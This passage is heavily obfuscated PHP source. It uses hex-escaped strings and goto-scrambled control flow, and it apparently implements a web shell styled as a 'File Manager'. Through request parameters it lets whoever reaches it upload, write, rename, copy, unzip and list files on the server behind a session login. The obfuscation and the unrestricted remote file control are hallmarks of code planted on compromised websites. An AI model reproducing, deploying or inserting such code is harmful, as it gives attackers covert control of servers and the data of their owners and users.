"\x3c\57\x61\x3e\74\57\x6c\151\76\xd\xa\11\x20\40\x3c\x6c\151\x3e\74\x61\40\150\x72\x65\x66\x3d\42\43\42\40\x6f\x6e\x63\154\x69\x63\153\x3d\x22\123\145\164\x55\x70\x6c\157\141\144\x46\151\154\x65\115\x6f\x64\141\x6c\x61\164\x74\162\50\x29\x3b\x72\x65\x74\x75\x72\x6e\x20\146\x61\x6c\163\145\x3b\x22\x3e\x3c\163\160\x61\156\x20\143\154\141\163\163\75\42\125\160\x6c\157\141\144\x49\x63\157\x6e\x22\x3e\74\57\x73\160\x61\x6e\76\40"; goto saSNv; v6h4e: echo "\342\206\220"; goto Y592h; XqqvX: echo $W7YOX[17]; goto zpQMe; j6IZf: X6T6B: goto ijpu0; KCHz1: echo $W7YOX[14]; goto fk5_B; ADjvj: unset($_SESSION); goto VWSi4; nzipy: if (!(isset($_FILES["\151\x6e\x70\x75\164\106\x69\154\145\x55\160\154\x6f\141\x64"]) && !empty($_FILES["\x69\x6e\x70\x75\x74\x46\x69\154\145\125\160\x6c\157\141\144"]["\156\x61\x6d\x65"]))) { goto aWxxy; } goto fLJ9Z; aHRm5: function w58Tw($g7ThV) { goto jKFdc; qXnoZ: return array("\x6c\x69\x73\164" => array_merge($LTzZC, $moc3F), "\164\151\x6d\145\x73" => $KjPGL, "\143\157\x75\156\164" => $PEjj0); goto y5vtu; NcbQG: foreach ($BsWPo as $f4vjY) { goto J0BHs; MJhu6: gOUOB: goto XTIgV; ugQua: $PEjj0++; goto luadV; J0BHs: if (!((in_array(Q6l_e($f4vjY), $r2sBB[0]) || count($r2sBB[0]) == 0) && $f4vjY !== "\56")) { goto HZjmn; } goto SfzL9; uTWpo: pTRdb: goto Db6Ta; tLRmr: $moc3F[] = $f4vjY; goto WidHe; TnURd: q1nkm: goto sj4XC; lbJUV: if (is_dir($f4vjY)) { goto q1nkm; } goto tLRmr; gIOqU: HZjmn: goto uTWpo; sj4XC: $LTzZC[] = $f4vjY; goto MJhu6; luadV: D36Cs: goto lbJUV; SfzL9: if (!($f4vjY !== "\x2e\x2e")) { goto D36Cs; } goto ugQua; XTIgV: $KjPGL[] = date("\x64\x2f\155\x2f\x59\40\x48\72\x69\x3a\x73", @filemtime($Lfznb . "\x2f" . $f4vjY)); goto gIOqU; WidHe: goto gOUOB; goto TnURd; Db6Ta: } goto uV4GK; z3C9Y: if (!(is_array($BsWPo) || is_object($BsWPo))) { goto DG6eM; } goto NcbQG; jKFdc: global $r2sBB, $Lfznb; goto K1Hhs; K1Hhs: $KjPGL = array(); goto jRJ9t; puwc0: $BsWPo = is_dir($g7ThV) ? @scandir($g7ThV) : array(); goto z3C9Y; PH5m1: $LTzZC = array(); goto uwd2i; jRJ9t: $moc3F = array(); goto PH5m1; uV4GK: ItGmj: goto KAtKT; uwd2i: $PEjj0 = 0; goto puwc0; KAtKT: DG6eM: goto qXnoZ; y5vtu: } goto TU4Yq; A5znU: echo "\x3c\x2f\142\165\164\x74\157\156\x3e\xd\xa\x20\x20\40\40\x20\x20\40\40\x3c\x62\x75\x74\164\x6f\156\40\x74\x79\160\x65\x3d\42\142\x75\164\x74\x6f\x6e\x22\x20\143\x6c\x61\163\163\x3d\x22\142\164\156\x20\x62\x74\156\x2d\144\x65\146\x61\165\154\x74\x22\x20\144\141\164\141\x2d\144\x69\x73\x6d\151\x73\163\x3d\x22\155\157\x64\x61\x6c\42\x3e"; goto vQBi5; CIOy2: $BsWPo = array_slice($BsWPo, $og4n9, $TdtK7); goto p9rx1; Qy6qy: function yz7Lh($f4vjY, $hSGKW = '', $kyoOG = "\167") { goto PMlkm; aONE0: return $W7YOX[34]; goto XgK6X; fN417: YKcDG: goto A5ZGn; Dy2fl: fclose($GBmS7); goto XRFPG; i95uB: if (fwrite($GBmS7, $hSGKW)) { goto YKcDG; } goto Dy2fl; NH3b8: if (!(file_exists($f4vjY) && (!filesize($f4vjY) || !is_readable($f4vjY)))) { goto rUZNv; } goto DjAtm; XgK6X: LLAyf: goto RHOC8; Es4Dp: CZlxD: goto NH3b8; DjAtm: return $W7YOX[21]; goto Cy_GA; Cy_GA: rUZNv: goto a3sah; a3sah: $GBmS7 = fopen($f4vjY, $kyoOG); goto axn__; Qcb9q: uRcsz: goto i95uB; A5ZGn: fclose($GBmS7); goto aONE0; BZF8K: goto LLAyf; goto fN417; axn__: if ($GBmS7) { goto uRcsz; } goto hB3Ml; hB3Ml: return $W7YOX[21]; goto Qcb9q; OkB5M: return $W7YOX[43]; goto Es4Dp; ZoYWl: if (!(file_exists($f4vjY) && $hSGKW == '')) { goto CZlxD; } goto OkB5M; XRFPG: return $W7YOX[33]; goto BZF8K; PMlkm: global $W7YOX; goto ZoYWl; RHOC8: } goto iOefu; fB55n: @rename($_GET["\x72\x65\x6e\141\x6d\145"], $Lfznb . "\x2f" . $_GET["\156\x65\167\162\145\x6e\141\155\x65"]); goto dTax2; pR5qP: $W7YOX[19] = "\123\145\141\x72\x63\x68"; goto ADFnx; VaIXD: $W7YOX[2] = "\105\x64\x69\x74"; goto uiypb; YOuDH: $_SESSION["\154\157\x67\x69\x6e"]["\163\164\141\164\165\163"] = "\x31"; goto KGnDW; Vc_lf: die(Y82vL(array("\164\x61\x62\x6c\x65" => "\74\144\151\x76\x20\x63\154\x61\x73\x73\x3d\42\x63\x6f\x6e\x74\141\x69\x6e\145\x72\x5f\x30\x31\x22\76\x3c\143\x65\156\x74\145\x72\76" . $W7YOX[31] . "\x3c\57\x63\x65\156\164\x65\x72\76\x3c\x2f\144\x69\166\x3e", "\x74\157\x74\141\154" => 1, "\x70\141\147\x65" => 1, "\144\x69\162" => '', "\144\x69\x72\110\164\x6d\154" => '', "\141\154\x65\x72\164" => sDozH($W7YOX[22])))); goto EePDO; Alqx4: $aBuS5 = SdOZh($aBuS5); goto H4TL0; wQegR: unset($_REQUEST); goto Ity4A; A8Qy5: echo $W7YOX[15]; goto oRQmp; BtPgj: $W7YOX[11] = "\106\151\154\x65\x20\x4d\x61\x6e\x61\147\145\162"; goto cB0Po; cp5VK: $W7YOX[21] = "\x55\x6e\x61\x62\154\x65\40\x74\157\40\x6f\x70\145\x6e\40\146\x69\154\145\x21"; goto ZSL_b; rCMmV: g1r5R: goto hGfgt; jSsED: echo "\74\57\x62\165\164\164\x6f\156\76\xd\xa\40\40\40\x20\40\x20\x20\x20\74\142\x75\164\x74\x6f\156\x20\164\x79\160\x65\x3d\x22\x62\x75\164\164\x6f\156\x22\40\x63\x6c\x61\163\163\75\x22\142\x74\156\40\x62\164\156\x2d\144\x65\x66\141\165\x6c\164\42\40\144\x61\164\x61\x2d\x64\x69\x73\x6d\x69\x73\x73\x3d\42\155\157\x64\141\154\x22\x3e"; goto bsUq7; NxfcO: if (!(is_array($BsWPo) || is_object($BsWPo))) { goto JyE45; } goto GNb7q; xTWul: $nY7pD .= "\x3c\x74\162\76"; goto pOhT3; XRdT0: function hZI9R($VJ8z7 = 0) { goto vRgsh; SVmt9: MJYm4: goto PojhK; szzZb: goto sVmzl; goto Rjmb5; JMpOV: RXUUt: goto HZR8l; NN4dK: echo "\x72\151\147\150\x74"; goto UblBO; ppCcK: if ($zaydo) { goto uxyeV; } goto aOrji; X822A: goto FumC5; goto SVmt9; x2Cn3: oY3vA: goto O0Mfe; BFm0e: goto oY3vA; goto JMpOV; vRgsh: global $zaydo; goto DKR58; DKR58: if ($VJ8z7 == 0) { goto RXUUt; } goto ppCcK; UblBO: sVmzl: goto BFm0e; Rjmb5: uxyeV: goto NN4dK; aOrji: echo "\154\x65\146\164"; goto szzZb; gupoI: echo "\162\151\147\x68\164"; goto X822A; PojhK: echo "\x6c\145\146\164"; goto uy0mJ; uy0mJ: FumC5: goto x2Cn3; HZR8l: if ($zaydo) { goto MJYm4; } goto gupoI; O0Mfe: } goto kWyJz; QgnNK: echo $W7YOX[39]; goto h3IXK; rIlek: echo "\x3c\57\142\165\164\x74\x6f\x6e\x3e\xd\xa\x20\x20\x20\40\x20\40\x20\40\74\57\x64\x69\166\x3e\15\12\x20\x20\40\x20\x20\40\74\x2f\144\x69\166\x3e\xd\xa\x20\x20\40\40\40\40\15\12\x20\x20\x20\40\x3c\x2f\x64\151\x76\x3e\15\xa\40\x20\x3c\57\144\x69\x76\x3e\15\xa\xd\12\xd\12\40\xd\xa\x20\x20\15\12\x20\40\40\x20\x20\x20\x20\40\x3c\x6f\154\40\x63\x6c\141\163\x73\x3d\x22\142\x72\145\x61\144\143\x72\x75\x6d\142\x22\x20\151\x64\75\x22\x62\162\x65\141\144\x63\162\165\155\142\42\76\x20\x20\74\x2f\157\x6c\x3e\11\11\40\15\12\x9\11\74\144\x69\166\40\151\x64\x3d\x22\143\157\x6e\x74\145\156\164\x22\x3e\x3c\x2f\144\151\166\76\x9\11\40\40\xd\12\11\x9\74\x69\156\160\x75\164\x20\164\x79\x70\145\x3d\42\150\151\x64\x64\x65\156\x22\x20\x69\x64\x3d\x22\144\x69\x72\145\x63\x74\x6f\x72\x79\42\76\x9\11\15\12\x9\11\x20\x3c\x64\x69\166\x20\151\x64\x3d\x22\x61\x6c\145\x72\164\x22\76\74\x2f\144\151\x76\x3e\15\12\x9\11\40\74\x75\x6c\40\x69\x64\x3d\42\160\x61\147\x69\x6e\x61\x74\x69\x6f\x6e\x22\x20\x63\154\141\163\x73\x3d\42\160\141\147\x69\x6e\x61\x74\x69\157\156\x22\76\74\57\x75\154\76\xd\12\40\x20\x20\x20\x20\x20\x20\x20\74\x73\x63\162\151\x70\164\40\164\x79\160\x65\x3d\42\x74\x65\170\164\57\x6a\x61\166\141\163\143\x72\x69\x70\164\42\x3e\xd\xa\11\x9\15\xa\57\x2a\52\15\12\x20\x2a\40\x20\x42\x6f\x6f\x74\124\x72\145\145\40\x54\x72\145\145\166\x69\145\167\x20\160\154\x75\x67\x69\x6e\40\146\x6f\162\40\102\157\157\x74\x73\x74\x72\x61\160\x2e\xd\xa\x20\52\15\12\x20\x2a\40\x20\x42\141\163\145\144\x20\157\x6e\x20\102\x6f\157\164\x53\156\151\x70\x70\x20\x54\162\145\145\x56\151\145\167\40\x45\x78\x61\x6d\x70\154\145\40\x62\171\x20\x53\x65\x61\x6e\40\x57\x65\163\163\x65\154\154\15\12\40\52\40\x20\x55\x52\x4c\x3a\x9\150\x74\x74\160\72\x2f\x2f\x62\x6f\157\164\x73\x6e\151\160\x70\x2e\x63\x6f\x6d\57\x73\156\x69\x70\160\145\x74\163\x2f\x66\145\141\x74\165\x72\145\x64\x2f\142\157\x6f\x74\163\164\x72\x61\160\55\x33\60\55\x74\x72\145\145\x76\151\x65\167\15\12\40\x2a\xd\xa\40\x2a\x9\122\145\x76\151\x73\x65\x64\x20\x63\x6f\x64\x65\40\142\x79\40\x4c\145\157\x20\x22\x4c\145\157\x56\x31\x31\x37\x22\x20\x4d\171\145\x72\x73\15\xa\x20\x2a\15\xa\40\x2a\x2f\15\xa\40\x76\141\162\40\x46\151\x6c\145\x54\171\x70\x65\x73\x20\x3d\x20\133\40"; goto sCFQe; lYyC7: $s6erP = array(); goto nzipy; ajob2: $XMJqR = isset($_GET["\160\x65\162\160\141\x67\145"]) ? "\164\141\142\x6c\x65\x2d\x66\x69\170\x65\x64" : ''; goto qIRwx; zcWnP: die(YZ7lh($_POST["\x77\x72\151\164\145"], $ksrpy)); goto x5u5X; xl46E: if ($zaydo) { goto IeVSB; } goto GiP5s; TmdIe: $fZ6Lt[5] = "\144\141\164\x61\x3a\x69\x6d\x61\x67\145\x2f\x70\x6e\147\73\x62\x61\x73\145\x36\x34\x2c\x69\x56\x42\x4f\122\167\x30\x4b\x47\147\x6f\101\x41\101\101\x4e\123\125\150\105\x55\147\x41\101\x41\102\x41\101\101\x41\101\x51\103\101\x59\x41\x41\101\x41\x66\70\x2f\x39\150\x41\x41\x41\101\x68\125\154\105\x51\126\121\64\152\x57\116\147\157\x43\132\x6f\x61\x47\147\121\x6d\124\102\x68\x51\154\126\57\x66\x33\70\x44\117\x6d\65\x70\141\x5a\x45\155\x61\115\x43\x45\103\x52\117\161\171\163\x72\x4b\145\116\110\106\x2b\x2f\166\67\107\x79\x5a\x4f\156\x50\151\x6c\157\141\107\102\x42\66\70\x42\x2f\x66\63\71\104\x62\152\x45\157\x61\x36\x37\x76\x6d\x72\x56\x4b\x6d\x5a\171\104\113\x68\x75\141\107\x6a\x67\x36\53\156\160\60\x5a\x67\x77\x59\x63\112\151\153\x67\x31\157\x61\62\x73\124\67\x65\x2f\x76\x72\64\x5a\66\65\x51\x44\112\x42\x68\103\164\x5a\x74\x53\x41\x59\x57\x48\101\x68\101\x6b\x54\57\103\x5a\117\x6e\104\x67\106\x57\x32\141\x43\x34\x59\153\124\x4a\x33\64\x6a\x5a\101\154\112\x41\101\x44\x63\x70\63\112\116\x6f\66\120\111\132\147\101\101\x41\101\x42\x4a\x52\125\x35\105\x72\x6b\x4a\147\x67\x67\75\75"; goto AUqa0; mrBDM: echo "\47\51\x3b\x7d\x29\x3b\15\xa\x9\11\11\40\40\x20\x24\50\x22\43\x6c\x69\x73\164\106\x6f\x6c\144\x65\x72\106\151\x6c\x65\x73\x22\51\x2e\150\164\x6d\x6c\50\47\x3c\x6c\x69\x3e\74\143\x65\x6e\164\x65\162\76\x3c\163\160\141\156\x20\143\x6c\141\x73\x73\x3d\x22\x4c\x6f\141\x64\151\156\x67\x22\x3e\x3c\x2f\163\160\x61\x6e\x3e\74\142\162\76\x3c\142\x72\76"; goto Q2XUz; OjBI2: c2jen: goto AGzRt; B1TqW: echo "\x27\x29\73\xd\xa\x9\11\x9\11\44\x2e\x67\145\x74\x4a\x53\117\x4e\x28\42\77\x74\x61\142\x6c\145\x26\x64\x69\162\75\42\53\144\151\x72\53\42\46\x23\144\151\x72\x65\x63\164\x6f\162\171\x22\x2c\40\146\165\156\x63\x74\x69\x6f\156\x28\162\145\163\165\x6c\x74\x29\173\40\x24\50\42\43\x52\x65\x73\165\154\x74\x22\x29\x2e\150\x74\x6d\154\50\162\145\163\165\x6c\x74\x2e\x74\x61\x62\154\145\x29\x3b\x20\x24\x28\47\43\x69\155\147\x55\x72\x6c\x27\x29\56\150\x74\x6d\154\x28\47\x23"; goto MfIrN; DbUR9: date_default_timezone_set("\125\x54\103"); goto Rhgqw; iIKRu: $r2sBB[1] = array(); goto ttya7; EgdRH: z8Vz5($_POST["\167\162\x69\164\145"]); goto OIB6x; EePDO: sLiut: goto mJsGm; VPtym: P6lY_: goto OWf_R; WIvF7: unset($PEjj0); goto dg791; Y592h: goto P6lY_; goto Ebm6F; OSttX: echo $W7YOX[33] . "\40\72\40" . $W7YOX[37]; goto FGeA0; G931X: echo "\x27\x2c\xd\xa\x9\11\x70\162\145\166\x20\72\40\x27\xc2\xab\x27\x2c\15\12\11\x9\x6e\145\170\x74\x20\72\x20\47\xc2\273\47\x2c\15\12\x9\11\154\x61\163\x74\x20\72\40\x27"; goto uAApj; R08I2: hzi9R(1); goto xOxff; WK_z1: fi8cc: goto EXomY; GU0Wb: echo $W7YOX[1]; goto uRt8_; FJW0H: $Lfznb = isset($_GET["\144\x69\x72"]) ? $_GET["\144\x69\x72"] : "\56"; goto ZVUJP; IIW1U: echo $W7YOX[3]; goto tNSaw; oWjPY: echo $fZ6Lt[12]; goto IJHRS; sY4YQ: unset($zaydo); goto Bn3hS; UBauP: echo "\11\x20\x20\xd\xa\x20\x20\40\x20\74\x2f\x75\154\76\15\12\40\40\x3c\57\x6c\x69\76\15\12\x3c\57\165\154\x3e\15\xa\x9\x20\xd\xa\40\40\40\40\40\40\40\x20\74\x64\x69\x76\40\x63\154\x61\x73\x73\x20\x3d\40\42\156\141\166\x62\141\x72\x2d\x66\x6f\x72\155\x20\156\141\x76\142\x61\162\55"; goto Tkd8f; c5QU4: echo "\x22\x3e\74\x2f\x73\x70\x61\156\x3e\40\15\12\x9\40\x20\x20\40\x3c\142\165\x74\164\x6f\x6e\40\164\171\x70\x65\x3d\42\163\165\142\x6d\x69\x74\x22\x20\x6e\141\155\x65\75\x22\165\160\154\157\x61\144\x22\40\x63\154\141\163\163\x3d\x22\142\164\x6e\40\x62\164\x6e\55\163\165\143\143\x65\163\163\42\40\x20\151\x64\x3d\42\106\151\154\x65\x55\160\x6c\157\x61\x64\x42\164\156\x22\x20\x64\x69\x73\141\x62\154\x65\144\x3e"; goto KCHz1; hr531: $fZ6Lt[7] = "\144\141\x74\141\x3a\x69\155\x61\147\x65\x2f\x70\x6e\147\x3b\x62\x61\x73\x65\66\x34\54\x69\126\102\x4f\122\x77\60\113\107\147\x6f\101\101\x41\101\116\x53\x55\x68\x45\125\147\x41\x41\101\102\x41\101\101\x41\x41\121\103\x41\x59\101\x41\x41\101\146\70\x2f\x39\150\x41\x41\101\101\x2f\105\154\x45\121\x56\x51\x34\152\141\x32\124\x50\125\160\x44\x55\x52\103\106\x42\62\167\x73\157\x70\x56\x64\x4e\165\101\x57\131\x70\162\x6f\101\x72\x4b\x47\153\x4d\66\x55\60\x54\x78\111\161\151\x6b\x65\141\115\x69\67\x37\65\x78\x54\x5a\x41\x58\x70\63\x6e\x49\103\x77\144\x72\117\x42\142\147\101\155\x2f\x73\147\166\x4e\70\x6f\x44\147\x78\x63\67\163\x7a\x35\x35\x6a\x43\130\141\x2f\x59\x66\64\145\x35\x33\112\x44\x63\101\x76\x4a\160\160\x6d\x67\65\x37\101\123\x51\63\67\x6a\x36\157\x33\147\x4e\167\123\x64\x2f\126\x57\160\111\153\116\x37\x58\x47\112\152\x41\101\152\x2b\x34\x2b\x69\x71\x4b\64\115\152\120\114\x38\61\167\x41\156\117\124\x37\112\131\x43\x31\x75\71\x39\x6d\127\130\132\120\x38\153\102\x79\102\127\101\x62\x61\x31\164\x33\166\x2b\x34\x45\126\x48\132\x7a\102\x44\101\x43\115\x4a\115\x55\x4a\x4b\127\71\104\163\67\161\123\167\103\152\145\110\64\x43\x73\x4c\x78\x6f\102\66\x55\x34\150\120\102\x67\x5a\150\x5a\x43\x65\x4b\171\112\165\x77\x42\x78\x38\166\150\115\x2f\116\157\x32\160\x51\131\147\53\126\113\113\101\x55\167\x6b\x6e\144\160\x63\61\x67\101\153\x46\x2b\125\x7a\x41\132\x6a\105\67\124\145\x36\142\x41\122\x49\x2b\x67\x49\x77\154\67\121\152\x75\127\160\x7a\62\x51\155\x51\x39\101\x6e\147\x75\141\x32\156\105\57\104\162\110\160\112\x54\x6b\x6d\71\x4e\156\66\154\115\153\166\165\x2b\111\x58\x2b\113\x48\61\x2b\130\x75\x79\60\65\x31\147\125\66\101\101\x41\101\x41\x45\x6c\106\124\x6b\123\x75\x51\x6d\103\x43"; goto Gm3ze; HgIFv: echo $W7YOX[40]; goto bFVSG; QP_Si: KeWcz($_GET["\143\157\160\171"], $_GET["\x74\x6f"]); goto OjBI2; nW1ax: echo "\47\51\x3b\11\11\xd\xa\x9\11\x9\40\40\40\144\x69\162\40\75\x20\x72\x65\160\154\x61\x63\145\x5f\x64\151\x72\x28\44\x28\x27\x23\132\151\160\x64\151\162\x27\51\x2e\166\141\154\50\51\x29\73\x20\15\12\11\x9\x9\x20\x20\40\x24\x2e\147\145\x74\x4a\123\117\x4e\50\x22\77\165\x6e\x7a\151\x70\x3d\x22\53\144\x69\x72\x2b\x22\46\164\x61\x62\x6c\x65\46\164\157\75\x22\53\x24\50\x27\x23\x46\x6f\x6c\144\145\x72\125\156\x7a\151\x70\x49\156\x70\x75\x74\x27\x29\56\x76\141\154\50\x29\x2c\40\x66\x75\156\143\x74\x69\x6f\156\x28\x64\141\164\x61\x29\173\15\12\11\40\x20\x20\x20\x20\40\40\x20\x20\x20\x20\x24\50\x22\x23\143\157\x6e\164\x65\x6e\x74\42\x29\56\150\164\x6d\x6c\50\x64\x61\164\141\x2e\x74\x61\142\154\145\51\x3b\15\12\x9\x9\11\x20\x20\40\x24\50\47\43\x61\154\x65\x72\164\47\51\56\x68\164\x6d\154\x28\x64\141\164\141\x2e\x61\x6c\x65\162\x74\51\x3b\x9\11\15\xa\11\x20\40\40\x20\x20\x20\40\x20\40\x20\x20\x24\x28\47\43\x5a\151\160\x46\151\154\145\47\x29\x2e\x6d\157\144\141\x6c\50\47\x68\x69\144\145\x27\x29\x3b\15\12\40\40\40\x20\x20\40\x20\x20\x20\x20\40\40\x20\40\x20\x24\50\42\43\106\x6f\x6c\x64\145\162\125\156\172\151\x70\111\156\x70\x75\164\x22\51\56\162\x65\155\157\x76\x65\x41\164\x74\162\50\x22\144\x69\x73\x61\142\154\x65\144\42\x29\73\15\xa\11\x9\x20\x20\40\40\x20\x20\x20\44\x28\x27\x23\132\151\x70\114\x61\142\145\x6c\163\x75\x63\x63\x65\163\x73\x27\51\56\150\x74\155\x6c\x28\x27\47\51\73\15\12\11\11\x9\40\40\x20\44\x28\x27\43\x46\x6f\154\x64\145\x72\x55\156\172\x69\x70\x49\x6e\x70\165\164\47\51\x2e\166\141\x6c\50\x27\x27\x29\x3b\xd\12\x9\11\x9\40\40\x20\x24\50\42\x23\132\151\160\x4c\x6f\141\144\42\51\x2e\x68\164\x6d\x6c\50\x27\x27\x29\x3b\15\xa\11\40\40\40\40\x20\x20\40\x20\x20\x7d\x29\73\x9\15\12\x20\x20\15\xa\x20\x20\x20\x20\40\40\40\x20\x20\40\x20\40\40\x7d\73\xd\12\x9\x9\11\x20\x64\145\154\x65\x74\x65\x20\x4c\157\x61\x64\151\156\x67\110\164\155\x6c\x3b\40\15\12\11\11\x9\40\57\x2a\xd\12\x9\x9\11\40\146\x6f\x72\40\50\x20\x76\x61\x72\40\x69\x20\151\x6e\x20\167\x69\156\144\157\167\40\x29\40\173\15\12\x20\40\x20\x20\40\x20\x20\x20\x20\40\x20\40\x20\40\x63\x6f\x6e\163\x6f\x6c\145\x2e\154\157\x67\50\x69\54\40\164\171\x70\145\157\146\40\x77\x69\x6e\x64\x6f\167\133\x69\x5d\x2c\x20\x77\x69\156\144\x6f\167\x5b\x69\135\51\73\15\12\11\x20\x20\40\x20\x20\40\40\x20\x20\175\x2a\x2f\xd\12\x20\40\40\40\x20\40\40\40\x3c\57\163\143\x72\x69\160\164\x3e\15\xa\x9\x9\x3c\57\x64\151\x76\76\xd\xa\40\x20\x20\x20\74\x2f\x62\x6f\x64\171\x3e\15\12\40\x20\40\x20\x3c\57\x68\164\x6d\154\x3e\xd\xa\11"; goto xgHQE; oj0Xf: pA47X: goto bME59; DL3AH: echo "\x29\x20\x6e\157\x2d\x72\x65\160\145\141\x74\40\154\x65\146\164\40\143\x65\156\164\x65\x72\73\160\141\x64\x64\x69\156\x67\x3a\40\65\160\x78\x20\60\40\65\x70\x78\x20\x32\65\x70\x78\x3b\155\141\x72\x67\151\x6e\55\x6c\x65\x66\164\72\x20\x35\160\170\x3b\x7d\xd\12\x2e\x55\163\145\x72\x49\x63\157\x6e\173\142\141\x63\x6b\x67\162\157\x75\156\x64\72\165\162\154\50\40"; goto oWjPY; sXPqA: function E8vdi($f4vjY) { goto nQeYg; cnuWa: if (!($f4vjY == "\115\x61\x74\143\x68\x5f\x6e\157\x74\x5f\146\x6f\165\156\144")) { goto Fdr2_; } goto hOy2N; mZbj0: return $nY7pD; goto i6qFV; AOA3b: $nY7pD .= "\x3c\x61\x20\x64\x61\x74\x61\55\164\157\147\147\x6c\x65\x3d\x22\x74\x6f\x6f\154\164\151\x70\42\x20\x74\151\164\154\x65\75\x22" . $W7YOX[20] . "\42\40\157\156\143\x6c\151\x63\153\75\x22\x53\x65\164\122\145\156\141\x6d\x65\x4d\157\x64\141\x6c\141\164\164\162\50" . "\47" . $Lfznb . "\x2f" . $f4vjY . "\x26\144\151\162\75" . $Lfznb . "\x26\x70\x61\147\x65\75" . $x5bhU . "\x27" . "\51\73\40\162\x65\164\165\162\156\x20\x66\141\x6c\x73\x65\x3b\x22\40\x68\162\x65\146\x3d\x22\x23\42\76\x3c\163\x70\x61\156\x20\x63\x6c\141\163\163\x3d\42\122\145\x6e\x61\x6d\145\x49\143\x6f\x6e\x22\76\74\57\x73\x70\141\x6e\76\74\57\x61\76"; goto mZbj0; rC0BP: goto YdHuC; goto Sbe1x; CJBkw: if (in_array(q6l_e($f4vjY), array("\172\151\160", "\x72\141\x72", "\67\172", "\x67\172\x69\160", "\x74\x61\x72", "\167\151\x6d", "\170\x7a"))) { goto sXHyO; } goto NmcSx; sr1mc: if (!($f4vjY == "\x2e\x2e")) { goto wT6di; } goto Ftfzo; pTX2U: Fdr2_: goto sr1mc; mHKcO: sXHyO: goto fb6Pu; vmR13: $c5XOl = $c5XOl["\x63\x6f\165\x6e\x74"]; goto kY7f3; SDScF: W5X28: goto mLI2A; jk2kk: goto YdHuC; goto VSJ8P; oOsg_: YdHuC: goto SDScF; fb6Pu: $nY7pD .= "\x3c\x61\40\x64\x61\x74\141\55\x74\157\x67\147\x6c\x65\x3d\x22\164\x6f\x6f\x6c\164\x69\160\x22\40\164\x69\x74\154\x65\x3d\x22" . $W7YOX[41] . "\42\x20\x6f\x6e\x63\154\x69\143\x6b\x3d\42\x53\145\164\132\151\160\106\x69\154\x65\x4d\x6f\x64\141\154\x61\164\164\x72\50" . "\47" . $Lfznb . "\x2f" . $f4vjY . "\x26\144\x69\x72\75" . $Lfznb . "\46\160\x61\147\145\x3d" . $x5bhU . "\x27" . "\51\x3b\40\162\145\x74\x75\162\x6e\40\x66\x61\x6c\163\145\73\42\x20\150\x72\x65\146\x3d\42\43\x22\76\74\x73\160\141\156\x20\x63\154\x61\163\x73\75\x22\132\x69\160\111\143\157\156\42\x3e\74\x2f\163\160\141\x6e\x3e\74\x2f\141\76\x20"; goto oOsg_; Xkrir: if (!$EoW3a) { goto W5X28; } goto JntZC; nQeYg: global $Lfznb, $x5bhU, $EoW3a, $W7YOX, $PEjj0, $r2sBB; goto cnuWa; Sbe1x: Cc3h8: goto PbqM7; mLI2A: $nY7pD .= "\x3c\x61\x20\144\141\x74\x61\55\164\x6f\x67\147\154\145\x3d\x22\164\157\157\154\x74\x69\x70\x22\x20\x74\x69\x74\154\x65\x3d\x22" . $W7YOX[40] . "\x22\40\x6f\x6e\143\x6c\151\x63\x6b\x3d\42\123\x65\164\x43\157\160\171\106\x69\x6c\x65\x4d\157\x64\141\154\x61\x74\164\162\x28" . "\47" . $Lfznb . "\57" . $f4vjY . "\46\144\x69\162\x3d" . $Lfznb . "\46\x70\141\147\145\x3d" . $x5bhU . "\x27" . "\51\73\x20\162\145\164\165\162\156\40\146\141\154\163\x65\x3b\42\40\150\x72\145\x66\x3d\42\x23\42\x3e\x3c\163\160\x61\156\x20\x63\x6c\141\163\x73\75\42\103\157\x70\171\111\143\x6f\x6e\x22\x3e\74\x2f\163\x70\x61\156\x3e\74\57\x61\76"; goto AOA3b; DPGGA: goto YdHuC; goto mHKcO; jiKkB: if (in_array(Q6l_e($f4vjY), $r2sBB[2])) { goto Cc3h8; } goto CJBkw; qwkrW: $c5XOl = w58tW($Lfznb . "\57" . $f4vjY); goto vmR13; kY7f3: $nY7pD .= "\x3c\x61\x20\144\141\164\141\x2d\x74\x6f\147\147\x6c\x65\x3d\x22\164\157\157\154\x74\x69\x70\42\x20\x74\151\164\154\x65\75\x22" . $W7YOX[18] . "\42\40\x20\157\x6e\x63\x6c\x69\x63\x6b\x3d\42\x53\145\x74\x53\150\157\167\106\x69\154\x65\x4d\157\x64\x61\x6c\x61\x74\x74\162\50" . "\x27" . $Lfznb . "\x2f" . $f4vjY . "\57\x26\x70\x65\x72\160\x61\x67\x65\75" . $c5XOl . "\x26\x23\144\151\162\145\x63\x74\x6f\x72\171\x27" . "\51\x3b\40\x72\x65\x74\x75\x72\156\x20\146\x61\154\163\145\73\42\x20\40\x68\x72\145\146\x3d\42\x23\x22\x3e\x3c\163\160\x61\156\x20\143\154\141\163\x73\75\x22\x4f\x46\157\x6c\x64\145\162\111\x63\x6f\156\x22\76\74\57\163\160\x61\x6e\76\x3c\57\x61\76\40"; goto Wn2va; PbqM7: $nY7pD .= "\x3c\x61\x20\144\x61\164\141\55\x74\157\147\147\154\x65\x3d\x22\164\x6f\x6f\x6c\164\151\160\42\x20\x74\151\164\x6c\145\75\42" . $W7YOX[3] . "\x22\40\x6f\156\143\154\x69\x63\x6b\x3d\42\x53\x65\164\123\x68\x6f\167\106\x69\154\x65\115\157\x64\x61\x6c\141\164\x74\162\50" . "\47" . $Lfznb . "\x2f" . $f4vjY . "\47" . "\x29\x3b\40\162\145\164\165\162\x6e\40\146\141\x6c\163\x65\73\42\40\150\x72\x65\146\x3d\42\43\x22\x3e\x3c\163\x70\x61\x6e\x20\143\x6c\x61\x73\163\x3d\x22\111\x6d\x61\147\x65\x49\x63\x6f\156\42\76\74\x2f\163\160\x61\x6e\76\74\57\x61\x3e\40"; goto DPGGA; Ftfzo: return "\x2d\55"; goto sAsTj; JntZC: if (is_dir($Lfznb . "\57" . $f4vjY)) { goto GADCL; } goto jiKkB; pci9F: $nY7pD = "\74\141\x20\x64\141\x74\x61\55\x74\157\x67\147\154\145\x3d\x22\164\157\157\x6c\164\151\160\x22\x20\164\151\x74\x6c\x65\x3d\42" . $W7YOX[1] . "\x22\x20\157\156\x63\x6c\x69\143\153\x3d\42\x53\x65\x74\122\145\x6d\x6f\166\145\x4d\x6f\x64\x61\x6c\x61\x74\164\x72\x28" . "\x27" . $Lfznb . "\x2f" . $f4vjY . "\x26\144\151\x72\x3d" . $Lfznb . "\46\x70\141\x67\145\75" . $x5bhU . "\47" . 